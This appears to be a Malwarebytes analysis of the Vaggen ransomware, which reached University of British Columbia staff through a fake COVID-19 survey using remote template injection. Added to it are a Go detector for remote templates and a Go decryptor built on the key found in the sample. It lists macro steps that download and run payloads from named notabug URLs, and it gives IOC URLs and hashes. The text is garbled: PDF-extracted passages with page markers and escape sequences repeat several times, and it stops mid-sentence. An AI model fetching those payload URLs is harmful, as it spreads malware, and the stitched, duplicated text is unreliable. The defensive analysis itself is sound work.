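The relationship Word follows to fetch a remote template is stored inside the document package (for Word, in word/_rels/settings.xml.rels as an attachedTemplate relationship), so the injection can be spotted without opening the file in Office. The Go program below is an added example, not code from the original post or from Malwarebytes: RemoteTemplates unzips a .docx in memory, reads every .rels part and reports attachedTemplate relationships whose external target is an http(s) or UNC location. The function names, the two embedded .rels samples (MaliciousRels, BenignRels) and the hostname template-host.invalid are constructed for the demonstration; the campaign's real template URL is not reproduced.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"os"
	"strings"
)

// Word stores the attached template as a relationship of this type; remote template
// injection is such a relationship whose target is a network location.
const attachedTemplateSuffix = "/relationships/attachedTemplate"

type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// A locally attached template (Normal.dotm) is also stored as External, so key on the scheme.
func isRemoteTarget(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") || strings.HasPrefix(t, `\\`)
}

// RemoteTemplates unzips a .docx held in memory, parses every .rels part and returns the
// network targets of attachedTemplate relationships, without opening the file in Office.
func RemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML zip container: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(io.LimitReader(rc, 1<<20)) // .rels parts are tiny; cap the read anyway
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, attachedTemplateSuffix) && strings.EqualFold(r.TargetMode, "External") && isRemoteTarget(r.Target) {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// Constructed settings.xml.rels parts: an injected document and a benign one.
// template-host.invalid is a placeholder, not a host from the campaign.
const MaliciousRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://template-host.invalid/raw/master/template.dotm" TargetMode="External"/>
</Relationships>`

const BenignRels = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file:///C:\Users\staff\AppData\Roaming\Microsoft\Templates\Normal.dotm" TargetMode="External"/>
</Relationships>`

// BuildSampleDocx wraps one settings.xml.rels part in a minimal zip so the check runs offline.
func BuildSampleDocx(settingsRels string) ([]byte, error) {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, err := zw.Create("word/_rels/settings.xml.rels")
	if err != nil {
		return nil, err
	}
	if _, err := io.WriteString(w, settingsRels); err != nil {
		return nil, err
	}
	if err := zw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

func main() { // usage: go run . <file.docx>
	docx, err := os.ReadFile(os.Args[1])
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	hits, err := RemoteTemplates(docx)
	fmt.Println("remote attached templates:", hits, "error:", err)
}
```

The benign sample matters: a document saved with a local template attached also carries an External attachedTemplate relationship, so alerting on TargetMode alone produces false positives. Keying on the scheme (http, https, or a UNC path) keeps the check focused on templates that Word would fetch over the network.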
The remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of the Shell call to determine whether it succeeded (on success, Shell returns the task ID of the launched process)
If successful, sends a GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, sends a GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event, which can be very useful as an early warning that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, starting with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The most relevant ones map to:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64; the XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
The file encryption uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is sealed with Go's gcm.Seal function.

The output file (with .VAGGEN extension) contains, in order:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". The string is exactly 32 bytes long, which is why it can be handed to AES-256 as-is. Using this key, we can easily decrypt the content; and because GCM authenticates the ciphertext, decrypting with the right key also confirms that a file was not truncated or corrupted.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
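Because the key is fixed in the binary and each .VAGGEN file carries its own nonce and tag, recovery needs nothing beyond the key quoted in the Vaggen ransomware section above. The Go program below is an added example, not a tool from Malwarebytes or from the original post: DecryptVaggenFile reverses the nonce || ciphertext || tag layout with AES-256-GCM, and RecoverFile writes the plaintext next to the encrypted file under the original name. The function names, NonceLen and TagLen are this example's own; SealLikeVaggen exists only to construct test input in the same layout (it draws the nonce from crypto/rand where the malware used CryptGenRandom), and the sample content is constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// FileKey is the 32-byte key recovered from the sample; AES-256 takes it as-is.
const FileKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	NonceLen = 12 // GCM standard nonce, stored at the start of every .VAGGEN file
	TagLen   = 16 // GCM tag, appended by gcm.Seal after the ciphertext
)

func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggenFile reverses the nonce || ciphertext || tag layout. Because GCM authenticates
// the ciphertext, a wrong key, a truncated file or a flipped byte fails cleanly instead of
// producing garbage.
func DecryptVaggenFile(blob, key []byte) ([]byte, error) {
	if len(blob) < NonceLen+TagLen {
		return nil, errors.New("file too short to hold a nonce and a tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:NonceLen], blob[NonceLen:], nil)
}

// SealLikeVaggen builds a blob in the same layout, for constructing test input only. The
// malware drew its nonce from CryptGenRandom; crypto/rand stands in for it here.
func SealLikeVaggen(plain, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, NonceLen)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst, so passing nonce as dst yields nonce||ct||tag.
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// RecoverFile decrypts a .VAGGEN file and writes the plaintext next to it under the original
// name, leaving the encrypted copy in place as evidence.
func RecoverFile(path string) (string, error) {
	const ext = ".VAGGEN"
	if !strings.HasSuffix(strings.ToUpper(path), ext) {
		return "", fmt.Errorf("%s does not carry the %s extension", path, ext)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := DecryptVaggenFile(blob, []byte(FileKey))
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	out := path[:len(path)-len(ext)]
	if err := os.WriteFile(out, plain, 0o600); err != nil {
		return "", err
	}
	return out, nil
}

func main() { // usage: go run . file1.VAGGEN file2.VAGGEN ...
	for _, p := range os.Args[1:] {
		if out, err := RecoverFile(p); err != nil {
			fmt.Println("failed:", err)
		} else {
			fmt.Println("recovered:", out)
		}
	}
}
```

Keep the .VAGGEN originals until the recovered files have been checked. A wrong key or a damaged file surfaces as Go's "cipher: message authentication failed" error from gcm.Open rather than as silently corrupt output, which is the one advantage the author's choice of GCM hands to the defender.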
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 242 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 243 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 244 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 245 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 246 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 247 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 248 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 249 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 250 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 251 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 252 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 253 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 254 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 255 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 256 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 257 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 258 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to 